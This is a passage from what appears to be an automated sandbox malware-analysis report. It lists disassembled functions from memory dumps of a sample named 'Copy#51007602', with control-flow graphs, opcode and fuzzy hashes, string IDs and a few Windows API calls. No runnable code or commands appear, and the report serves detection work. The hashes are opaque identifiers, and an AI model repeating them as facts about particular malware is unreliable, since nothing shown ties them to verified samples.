                                                • Instruction ID: e89c8fd8db6b0a091c97b525b266aa8d6425160503451930454abf45486099bb
                                                • Opcode Fuzzy Hash: 10a61f88b03d15ad292216b2c88acc01808f7efb53bdb4d27f66dc6fecdd632e
                                                • Instruction Fuzzy Hash: 2AD26A34E00209CFDB64DF68C488A9DBBF6FF85314F5485AAD409AB265EB34ED85CB50
                                                Function 06FEB250 Relevance: 8.3, Strings: 6, Instructions: 769COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3723351465
                                                • Opcode ID: 80bface151475026d15f65d4acd8514c2a6b83ea554de6c8777639124904b41e
                                                • Instruction ID: ffecea02ca978cb8c67ff875ef0e70c666d59617ecb1a3bbf3ca5a75b631aaf2
                                                • Opcode Fuzzy Hash: 80bface151475026d15f65d4acd8514c2a6b83ea554de6c8777639124904b41e
                                                • Instruction Fuzzy Hash: 9B525E30E0020A9FDB64CF6DD6947AEBBB6FB45310F20892AE409DB355DA35DC81CB91
                                                Function 06FE7D90 Relevance: 3.0, Strings: 2, Instructions: 469COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2324 6fe7d90-6fe7dae 2325 6fe7db0-6fe7db3 2324->2325 2326 6fe7dd4-6fe7dd7 2325->2326 2327 6fe7db5-6fe7dcf 2325->2327 2328 6fe7dee-6fe7df1 2326->2328 2329 6fe7dd9-6fe7de7 2326->2329 2327->2326 2331 6fe7e14-6fe7e17 2328->2331 2332 6fe7df3-6fe7e0f 2328->2332 2339 6fe7de9 2329->2339 2340 6fe7e36-6fe7e4c 2329->2340 2333 6fe7e19-6fe7e23 2331->2333 2334 6fe7e24-6fe7e26 2331->2334 2332->2331 2336 6fe7e2d-6fe7e30 2334->2336 2337 6fe7e28 2334->2337 2336->2325 2336->2340 2337->2336 2339->2328 2344 6fe8067-6fe8071 2340->2344 2345 6fe7e52-6fe7e5b 2340->2345 2346 6fe8072-6fe80a7 2345->2346 2347 6fe7e61-6fe7e7e 2345->2347 2350 6fe80a9-6fe80ac 2346->2350 2356 6fe8054-6fe8061 2347->2356 2357 6fe7e84-6fe7eac 2347->2357 2351 6fe82d8-6fe82db 2350->2351 2352 6fe80b2-6fe80c1 2350->2352 2354 6fe8392-6fe8395 2351->2354 2355 6fe82e1-6fe82ed 2351->2355 2362 6fe80c3-6fe80de 2352->2362 2363 6fe80e0-6fe811b 2352->2363 2359 6fe83b8-6fe83ba 2354->2359 2360 6fe8397-6fe83b3 2354->2360 2364 6fe82f8-6fe82fa 2355->2364 2356->2344 2356->2345 2357->2356 2379 6fe7eb2-6fe7ebb 2357->2379 2365 6fe83bc 2359->2365 2366 6fe83c1-6fe83c4 2359->2366 2360->2359 2362->2363 2380 6fe82ac-6fe82c2 2363->2380 2381 6fe8121-6fe8132 2363->2381 2369 6fe82fc-6fe8302 2364->2369 2370 6fe8312-6fe8319 2364->2370 2365->2366 2366->2350 2367 6fe83ca-6fe83d3 2366->2367 2376 6fe8306-6fe8308 2369->2376 2377 6fe8304 2369->2377 2371 6fe832a 2370->2371 2372 6fe831b-6fe8328 2370->2372 2378 6fe832f-6fe8331 2371->2378 2372->2378 2376->2370 2377->2370 2383 6fe8348-6fe8381 2378->2383 2384 6fe8333-6fe8336 2378->2384 2379->2346 2385 6fe7ec1-6fe7edd 2379->2385 2380->2351 2392 6fe8138-6fe8155 2381->2392 2393 6fe8297-6fe82a6 2381->2393 2383->2352 2405 6fe8387-6fe8391 2383->2405 2384->2367 2394 6fe8042-6fe804e 2385->2394 2395 6fe7ee3-6fe7f0d 2385->2395 2392->2393 2402 6fe815b-6fe8251 call 6fe65b0 2392->2402 2393->2380 2393->2381 2394->2356 2394->2379 2408 6fe8038-6fe803d 2395->2408 2409 6fe7f13-6fe7f3b 2395->2409 2457 6fe825f 2402->2457 2458 6fe8253-6fe825d 2402->2458 2408->2394 2409->2408 2415 6fe7f41-6fe7f6f 2409->2415 2415->2408 2421 6fe7f75-6fe7f7e 2415->2421 2421->2408 2423 6fe7f84-6fe7fb6 2421->2423 2430 6fe7fb8-6fe7fbc 2423->2430 2431 6fe7fc1-6fe7fdd 2423->2431 2430->2408 2432 6fe7fbe 2430->2432 2431->2394 2433 6fe7fdf-6fe8036 call 6fe65b0 2431->2433 2432->2431 2433->2394 2459 6fe8264-6fe8266 2457->2459 2458->2459 2459->2393 2460 6fe8268-6fe826d 2459->2460 2461 6fe826f-6fe8279 2460->2461 2462 6fe827b 2460->2462 2463 6fe8280-6fe8282 2461->2463 2462->2463 2463->2393 2464 6fe8284-6fe8290 2463->2464 2464->2393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: 118c2e9abc9209aad3a70f2c87a6478d2ef1e5a90d55ed389d3eed00f9874d2e
                                                • Instruction ID: 7d2b6f1b1f5204b25d6956433423a632e5172f57e3943f579cc2b605928f1cab
                                                • Opcode Fuzzy Hash: 118c2e9abc9209aad3a70f2c87a6478d2ef1e5a90d55ed389d3eed00f9874d2e
                                                • Instruction Fuzzy Hash: E702BE30B002199FDB54EF68E494AAEBBF2FF84354F108529D4199B395DB35EC86CB81
                                                Function 06FE6600 Relevance: .8, Instructions: 807COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5f6167c7990dedb0cf2b8a26caf9ea12700523b91c952861294e7733d921ab3
                                                • Instruction ID: 568ef22d69bb047ac9b67388db9785e6c83e6f5c445802134efb842bf8fc1ebf
                                                • Opcode Fuzzy Hash: e5f6167c7990dedb0cf2b8a26caf9ea12700523b91c952861294e7733d921ab3
                                                • Instruction Fuzzy Hash: 15628D34F002099FDB64DB68D594AADBBF2EF84314F648469E40ADB395DB35EC42CB81
                                                Function 06FEC190 Relevance: .6, Instructions: 637COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6d7a1147c05a60a9b3c22996a2bb7c4a0f952315f276df774524998cf9d42348
                                                • Instruction ID: c160093ac983ca7d2f5f526f53a23c6015e2c6b714ada698a2eec66d7e99317b
                                                • Opcode Fuzzy Hash: 6d7a1147c05a60a9b3c22996a2bb7c4a0f952315f276df774524998cf9d42348
                                                • Instruction Fuzzy Hash: BF329F34F102099FDB54DB68E884BADBBB6FB88310F108529E515DB395DB34EC46CB91
                                                Function 06FE55B0 Relevance: .6, Instructions: 600COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e4aecdbed737d0e4b50a8c983a2a1142949c4142314c1c7083a5587e1b913f0
                                                • Instruction ID: 9fa2714a30b1cb0a65a894c019e79fa1cca1d9676f2b19bdf1c7072160136a26
                                                • Opcode Fuzzy Hash: 9e4aecdbed737d0e4b50a8c983a2a1142949c4142314c1c7083a5587e1b913f0
                                                • Instruction Fuzzy Hash: 0C22C375F002198FDF64CFA8C4906AEBBB2FF85318F208469D456AB344DA36DD42CB91
                                                Function 06FEACE8 Relevance: 10.4, Strings: 8, Instructions: 400COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 527 6feace8-6fead06 528 6fead08-6fead0b 527->528 529 6fead0d-6fead20 528->529 530 6fead25-6fead28 528->530 529->530 531 6fead2a-6fead33 530->531 532 6fead42-6fead45 530->532 536 6feaf1f 531->536 537 6fead39-6fead3d 531->537 533 6fead4f-6fead52 532->533 534 6fead47-6fead4c 532->534 538 6fead54-6fead5d 533->538 539 6fead62-6fead65 533->539 534->533 542 6feaf21-6feaf28 536->542 537->532 538->539 540 6fead88-6fead8b 539->540 541 6fead67-6fead83 539->541 544 6fead9c-6fead9f 540->544 545 6fead8d-6fead91 540->545 541->540 543 6feaf29 542->543 543->542 546 6feaf2b-6feaf31 543->546 550 6feaf05-6feaf0e 544->550 551 6feada5-6feada8 544->551 548 6fead97 545->548 549 6feaf14-6feaf1e 545->549 546->543 552 6feaf33-6feaf56 546->552 548->544 550->531 550->549 553 6feadbc-6feadbe 551->553 554 6feadaa-6feadb7 551->554 555 6feaf58-6feaf5b 552->555 556 6feadc5-6feadc8 553->556 557 6feadc0 553->557 554->553 560 6feaf5d-6feaf67 555->560 561 6feaf68-6feaf6b 555->561 556->528 562 6feadce-6feadf2 556->562 557->556 563 6feaf6d 561->563 564 6feaf7a-6feaf7d 561->564 577 6feadf8-6feae07 562->577 578 6feaf02 562->578 654 6feaf6d call 6feb23f 563->654 655 6feaf6d call 6feb250 563->655 566 6feaf7f-6feaf9b 564->566 567 6feafa0-6feafa3 564->567 566->567 568 6feb20c-6feb20f 567->568 569 6feafa9-6feafe4 567->569 571 6feb220-6feb222 568->571 572 6feb211-6feb215 568->572 581 6feafea-6feaff6 569->581 582 6feb1d7-6feb1ea 569->582 570 6feaf73-6feaf75 570->564 579 6feb229-6feb22c 571->579 580 6feb224 571->580 572->569 576 6feb21b 572->576 576->571 589 6feae1f-6feae5a call 6fe65b0 577->589 590 6feae09-6feae0f 577->590 578->550 579->555 583 6feb232-6feb23c 579->583 580->579 591 6feaff8-6feb011 581->591 592 6feb016-6feb05a 581->592 585 6feb1ec 582->585 585->568 606 6feae5c-6feae62 589->606 607 6feae72-6feae89 589->607 593 6feae13-6feae15 590->593 594 6feae11 590->594 591->585 608 6feb05c-6feb06e 592->608 609 6feb076-6feb0b5 592->609 593->589 594->589 610 6feae66-6feae68 606->610 611 6feae64 606->611 619 6feae8b-6feae91 607->619 620 6feaea1-6feaeb2 607->620 608->609 616 6feb19c-6feb1b1 609->616 617 6feb0bb-6feb196 call 6fe65b0 609->617 610->607 611->607 616->582 617->616 622 6feae95-6feae97 619->622 623 6feae93 619->623 627 6feaeca-6feaefb 620->627 628 6feaeb4-6feaeba 620->628 622->620 623->620 627->578 630 6feaebe-6feaec0 628->630 631 6feaebc 628->631 630->627 631->627 654->570 655->570
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-1273862796
                                                • Opcode ID: 952c247eb38dc4617aaf4dffadf4f70c81337e251810a262a2b52b3106871f4d
                                                • Instruction ID: b55c8eacfff69f5b7912c656ecf88ff8bc6d578552786bf360d02a97d2b2baf7
                                                • Opcode Fuzzy Hash: 952c247eb38dc4617aaf4dffadf4f70c81337e251810a262a2b52b3106871f4d
                                                • Instruction Fuzzy Hash: FFE18E30F102098FCB69DF69D9946AEBBB6FF85304F208529D805AB355DB34EC46CB91
                                                Function 06FD2E08 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1414 6fd2e08-6fd2e97 GetCurrentProcess 1418 6fd2e99-6fd2e9f 1414->1418 1419 6fd2ea0-6fd2ed4 GetCurrentThread 1414->1419 1418->1419 1420 6fd2edd-6fd2f11 GetCurrentProcess 1419->1420 1421 6fd2ed6-6fd2edc 1419->1421 1423 6fd2f1a-6fd2f35 call 6fd2fe6 1420->1423 1424 6fd2f13-6fd2f19 1420->1424 1421->1420 1427 6fd2f3b-6fd2f6a GetCurrentThreadId 1423->1427 1424->1423 1428 6fd2f6c-6fd2f72 1427->1428 1429 6fd2f73-6fd2fd5 1427->1429 1428->1429
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2E86
                                                • GetCurrentThread.KERNEL32 ref: 06FD2EC3
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2F00
                                                • GetCurrentThreadId.KERNEL32 ref: 06FD2F59
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: f1a6e1f6ce80f73ae4a2530804450612cc602660f367d466f74281d3bda1d783
                                                • Instruction ID: 6506bd971aa8a1f7a5149e4596d1ac45687b6f9f21b254a998d2085158ca3325
                                                • Opcode Fuzzy Hash: f1a6e1f6ce80f73ae4a2530804450612cc602660f367d466f74281d3bda1d783
                                                • Instruction Fuzzy Hash: 5E5137B0D003098FDB54DFA9D648BAEBBF6FF48314F248459D119A7250D738A944CBA5
                                                Function 06FD2E02 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1392 6fd2e02-6fd2e97 GetCurrentProcess 1396 6fd2e99-6fd2e9f 1392->1396 1397 6fd2ea0-6fd2ed4 GetCurrentThread 1392->1397 1396->1397 1398 6fd2edd-6fd2f11 GetCurrentProcess 1397->1398 1399 6fd2ed6-6fd2edc 1397->1399 1401 6fd2f1a-6fd2f35 call 6fd2fe6 1398->1401 1402 6fd2f13-6fd2f19 1398->1402 1399->1398 1405 6fd2f3b-6fd2f6a GetCurrentThreadId 1401->1405 1402->1401 1406 6fd2f6c-6fd2f72 1405->1406 1407 6fd2f73-6fd2fd5 1405->1407 1406->1407
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2E86
                                                • GetCurrentThread.KERNEL32 ref: 06FD2EC3
                                                • GetCurrentProcess.KERNEL32 ref: 06FD2F00
                                                • GetCurrentThreadId.KERNEL32 ref: 06FD2F59
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255348099.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 15342f10642b265088ffb38ecd475c385bc4d9f4081371104b691be0eba54724
                                                • Instruction ID: 0723eb284720b92012ccc65f8c0019c3ed84462087220ed7b7fe9b871ad7465c
                                                • Opcode Fuzzy Hash: 15342f10642b265088ffb38ecd475c385bc4d9f4081371104b691be0eba54724
                                                • Instruction Fuzzy Hash: 6D5126B4D003098FDB54DFA9D648BAEBBF2FF48314F248459D119A7260D738A984CFA5
                                                Function 06FE9160 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1436 6fe9160-6fe9185 1437 6fe9187-6fe918a 1436->1437 1438 6fe918c-6fe91ab 1437->1438 1439 6fe91b0-6fe91b3 1437->1439 1438->1439 1440 6fe91b9-6fe91ce 1439->1440 1441 6fe9a73-6fe9a75 1439->1441 1448 6fe91e6-6fe91fc 1440->1448 1449 6fe91d0-6fe91d6 1440->1449 1443 6fe9a7c-6fe9a7f 1441->1443 1444 6fe9a77 1441->1444 1443->1437 1446 6fe9a85-6fe9a8f 1443->1446 1444->1443 1453 6fe9207-6fe9209 1448->1453 1450 6fe91da-6fe91dc 1449->1450 1451 6fe91d8 1449->1451 1450->1448 1451->1448 1454 6fe920b-6fe9211 1453->1454 1455 6fe9221-6fe9292 1453->1455 1456 6fe9215-6fe9217 1454->1456 1457 6fe9213 1454->1457 1466 6fe92be-6fe92da 1455->1466 1467 6fe9294-6fe92b7 1455->1467 1456->1455 1457->1455 1472 6fe92dc-6fe92ff 1466->1472 1473 6fe9306-6fe9321 1466->1473 1467->1466 1472->1473 1478 6fe934c-6fe9367 1473->1478 1479 6fe9323-6fe9345 1473->1479 1484 6fe9369-6fe938b 1478->1484 1485 6fe9392-6fe939c 1478->1485 1479->1478 1484->1485 1486 6fe939e-6fe93a7 1485->1486 1487 6fe93ac-6fe9426 1485->1487 1486->1446 1493 6fe9428-6fe9446 1487->1493 1494 6fe9473-6fe9488 1487->1494 1498 6fe9448-6fe9457 1493->1498 1499 6fe9462-6fe9471 1493->1499 1494->1441 1498->1499 1499->1493 1499->1494
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q$$]q
                                                • API String ID: 0-858218434
                                                • Opcode ID: 6f6b66e56c0d4365248c58e7182b92443e08112cb9263ac4ab78bece3824c3bd
                                                • Instruction ID: ead51680c81cc53a09deb8b2ec118ae42d7162b2da3d3de440a1499b83bee9e3
                                                • Opcode Fuzzy Hash: 6f6b66e56c0d4365248c58e7182b92443e08112cb9263ac4ab78bece3824c3bd
                                                • Instruction Fuzzy Hash: 53915130F0020A9FDB54DF69D854BAEB7F6FF84244F508465C809EB345EE74AD468BA2
                                                Function 06FECF58 Relevance: 4.5, Strings: 3, Instructions: 798COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1502 6fecf58-6fecf73 1503 6fecf75-6fecf78 1502->1503 1504 6fecf7a-6fecfbc 1503->1504 1505 6fecfc1-6fecfc4 1503->1505 1504->1505 1506 6fed00d-6fed010 1505->1506 1507 6fecfc6-6fed008 1505->1507 1508 6fed059-6fed05c 1506->1508 1509 6fed012-6fed054 1506->1509 1507->1506 1511 6fed05e-6fed0a0 1508->1511 1512 6fed0a5-6fed0a8 1508->1512 1509->1508 1511->1512 1516 6fed0aa-6fed0ac 1512->1516 1517 6fed0b7-6fed0ba 1512->1517 1522 6fed43d 1516->1522 1523 6fed0b2 1516->1523 1518 6fed0bc-6fed0fe 1517->1518 1519 6fed103-6fed106 1517->1519 1518->1519 1527 6fed108-6fed124 1519->1527 1528 6fed129-6fed12c 1519->1528 1525 6fed440-6fed44c 1522->1525 1523->1517 1533 6fed1fc-6fed20b 1525->1533 1534 6fed452-6fed73f 1525->1534 1527->1528 1530 6fed12e-6fed13d 1528->1530 1531 6fed175-6fed178 1528->1531 1538 6fed13f-6fed144 1530->1538 1539 6fed14c-6fed158 1530->1539 1531->1525 1541 6fed17e-6fed181 1531->1541 1536 6fed20d-6fed212 1533->1536 1537 6fed21a-6fed226 1533->1537 1714 6fed966-6fed970 1534->1714 1715 6fed745-6fed74b 1534->1715 1536->1537 1545 6fed22c-6fed23e 1537->1545 1546 6fed971-6fed9a6 1537->1546 1538->1539 1539->1546 1548 6fed15e-6fed170 1539->1548 1550 6fed1ca-6fed1cd 1541->1550 1551 6fed183-6fed1c5 1541->1551 1569 6fed243-6fed246 1545->1569 1568 6fed9a8-6fed9ab 1546->1568 1548->1531 1553 6fed1cf-6fed1d4 1550->1553 1554 6fed1d7-6fed1da 1550->1554 1551->1550 1553->1554 1561 6fed1dc-6fed1f2 1554->1561 1562 6fed1f7-6fed1fa 1554->1562 1561->1562 1562->1533 1562->1569 1572 6fed9ad 1568->1572 1573 6fed9ba-6fed9bd 1568->1573 1576 6fed28f-6fed292 1569->1576 1577 6fed248-6fed28a 1569->1577 1761 6fed9ad call 6fedad8 1572->1761 1762 6fed9ad call 6fedac5 1572->1762 1582 6fed9bf-6fed9eb 1573->1582 1583 6fed9f0-6fed9f3 1573->1583 1580 6fed2db-6fed2de 1576->1580 1581 6fed294-6fed2d6 1576->1581 1577->1576 1588 6fed2e9-6fed2eb 1580->1588 1589 6fed2e0-6fed2e2 1580->1589 1581->1580 1582->1583 1590 6feda16-6feda18 1583->1590 1591 6fed9f5-6feda11 1583->1591 1586 6fed9b3-6fed9b5 1586->1573 1597 6fed2ed 1588->1597 1598 6fed2f2-6fed2f5 1588->1598 1595 6fed2fb-6fed304 1589->1595 1596 6fed2e4 1589->1596 1599 6feda1f-6feda22 1590->1599 1600 6feda1a 1590->1600 1591->1590 1604 6fed306-6fed30b 1595->1604 1605 6fed313-6fed31f 1595->1605 1596->1588 1597->1598 1598->1503 1598->1595 1599->1568 1606 6feda24-6feda33 1599->1606 1600->1599 1604->1605 1609 6fed325-6fed339 1605->1609 1610 6fed430-6fed435 1605->1610 1619 6feda9a-6fedaaf 1606->1619 1620 6feda35-6feda98 call 6fe65b0 1606->1620 1609->1522 1623 6fed33f-6fed351 1609->1623 1610->1522 1620->1619 1632 6fed375-6fed377 1623->1632 1633 6fed353-6fed359 1623->1633 1640 6fed381-6fed38d 1632->1640 1636 6fed35d-6fed369 1633->1636 1637 6fed35b 1633->1637 1638 6fed36b-6fed373 1636->1638 1637->1638 1638->1640 1646 6fed38f-6fed399 1640->1646 1647 6fed39b 1640->1647 1650 6fed3a0-6fed3a2 1646->1650 1647->1650 1650->1522 1652 6fed3a8-6fed3c4 call 6fe65b0 1650->1652 1661 6fed3c6-6fed3cb 1652->1661 1662 6fed3d3-6fed3df 1652->1662 1661->1662 1662->1610 1664 6fed3e1-6fed42e 1662->1664 1664->1522 1716 6fed74d-6fed752 1715->1716 1717 6fed75a-6fed763 1715->1717 1716->1717 1717->1546 1718 6fed769-6fed77c 1717->1718 1720 6fed956-6fed960 1718->1720 1721 6fed782-6fed788 1718->1721 1720->1714 1720->1715 1722 6fed78a-6fed78f 1721->1722 1723 6fed797-6fed7a0 1721->1723 1722->1723 1723->1546 1724 6fed7a6-6fed7c7 1723->1724 1727 6fed7c9-6fed7ce 1724->1727 1728 6fed7d6-6fed7df 1724->1728 1727->1728 1728->1546 1729 6fed7e5-6fed802 1728->1729 1729->1720 1732 6fed808-6fed80e 1729->1732 1732->1546 1733 6fed814-6fed82d 1732->1733 1735 6fed949-6fed950 1733->1735 1736 6fed833-6fed85a 1733->1736 1735->1720 1735->1732 1736->1546 1739 6fed860-6fed86a 1736->1739 1739->1546 1740 6fed870-6fed887 1739->1740 1742 6fed889-6fed894 1740->1742 1743 6fed896-6fed8b1 1740->1743 1742->1743 1743->1735 1748 6fed8b7-6fed8d0 call 6fe65b0 1743->1748 1752 6fed8df-6fed8e8 1748->1752 1753 6fed8d2-6fed8d7 1748->1753 1752->1546 1754 6fed8ee-6fed942 1752->1754 1753->1752 1754->1735 1761->1586 1762->1586
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q$$]q
                                                • API String ID: 0-182748909
                                                • Opcode ID: 18da603910e8dd52ac7bf2a2174a9c35f9f2a3038d2974a92ab66f791f0858d1
                                                • Instruction ID: 0cf343d73e2a0d02703677c12188447a0cc2eb24776dda3869fae17bc896116f
                                                • Opcode Fuzzy Hash: 18da603910e8dd52ac7bf2a2174a9c35f9f2a3038d2974a92ab66f791f0858d1
                                                • Instruction Fuzzy Hash: 40625E30B0020A9FCB55DF68E594A5EBBF6FF84354B208928D0099F769DB75EC46CB81
                                                Function 06FE4B80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1763 6fe4b80-6fe4ba4 1764 6fe4ba6-6fe4ba9 1763->1764 1765 6fe4baf-6fe4ca7 1764->1765 1766 6fe5288-6fe528b 1764->1766 1786 6fe4cad-6fe4cf5 1765->1786 1787 6fe4d2a-6fe4d31 1765->1787 1767 6fe52ac-6fe52ae 1766->1767 1768 6fe528d-6fe52a7 1766->1768 1770 6fe52b5-6fe52b8 1767->1770 1771 6fe52b0 1767->1771 1768->1767 1770->1764 1773 6fe52be-6fe52cb 1770->1773 1771->1770 1808 6fe4cfa call 6fe5438 1786->1808 1809 6fe4cfa call 6fe5429 1786->1809 1788 6fe4d37-6fe4da7 1787->1788 1789 6fe4db5-6fe4dbe 1787->1789 1806 6fe4da9 1788->1806 1807 6fe4db2 1788->1807 1789->1773 1800 6fe4d00-6fe4d1c 1803 6fe4d1e 1800->1803 1804 6fe4d27 1800->1804 1803->1804 1804->1787 1806->1807 1807->1789 1808->1800 1809->1800
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fbq$XPbq$\Obq
                                                • API String ID: 0-4057264190
                                                • Opcode ID: 66c61799904d174c3f18004c1a711dec3ffbde0ae7a8b69e9bc045d32139baf8
                                                • Instruction ID: 047d4494fcb91eba7f69d3d9d4842893468c9058b1555648fd48afe5359e4e37
                                                • Opcode Fuzzy Hash: 66c61799904d174c3f18004c1a711dec3ffbde0ae7a8b69e9bc045d32139baf8
                                                • Instruction Fuzzy Hash: 02616174F002099FEB649FA5C4547AEBBF6FB88300F208429E109AB395DF755C418F91
                                                Function 06FE914F Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2699 6fe914f-6fe9185 2702 6fe9187-6fe918a 2699->2702 2703 6fe918c-6fe91ab 2702->2703 2704 6fe91b0-6fe91b3 2702->2704 2703->2704 2705 6fe91b9-6fe91ce 2704->2705 2706 6fe9a73-6fe9a75 2704->2706 2713 6fe91e6-6fe91fc 2705->2713 2714 6fe91d0-6fe91d6 2705->2714 2708 6fe9a7c-6fe9a7f 2706->2708 2709 6fe9a77 2706->2709 2708->2702 2711 6fe9a85-6fe9a8f 2708->2711 2709->2708 2718 6fe9207-6fe9209 2713->2718 2715 6fe91da-6fe91dc 2714->2715 2716 6fe91d8 2714->2716 2715->2713 2716->2713 2719 6fe920b-6fe9211 2718->2719 2720 6fe9221-6fe9292 2718->2720 2721 6fe9215-6fe9217 2719->2721 2722 6fe9213 2719->2722 2731 6fe92be-6fe92da 2720->2731 2732 6fe9294-6fe92b7 2720->2732 2721->2720 2722->2720 2737 6fe92dc-6fe92ff 2731->2737 2738 6fe9306-6fe9321 2731->2738 2732->2731 2737->2738 2743 6fe934c-6fe9367 2738->2743 2744 6fe9323-6fe9345 2738->2744 2749 6fe9369-6fe938b 2743->2749 2750 6fe9392-6fe939c 2743->2750 2744->2743 2749->2750 2751 6fe939e-6fe93a7 2750->2751 2752 6fe93ac-6fe9426 2750->2752 2751->2711 2758 6fe9428-6fe9446 2752->2758 2759 6fe9473-6fe9488 2752->2759 2763 6fe9448-6fe9457 2758->2763 2764 6fe9462-6fe9471 2758->2764 2759->2706 2763->2764 2764->2758 2764->2759
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.3255518644.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fe0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: c9b6b462dbd57b1453c90111bbb341348fcc2c5ef7698f6ea96e41d9139b36e0
                                                • Instruction ID: 939c4ffc3b9928e510d5fca318a8ef606af7451c679908a88a1b424878d9c5c3
                                                • Opcode Fuzzy Hash: c9b6b462dbd57b1453c90111bbb341348fcc2c5ef7698f6ea96e41d9139b36e0
                                                • Instruction Fuzzy Hash: 0E517030F001069FDB54DB78E854B6EB7F6EFC4654F108469C809DB385EE74AD468BA1
                                                Function 06FDB318 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
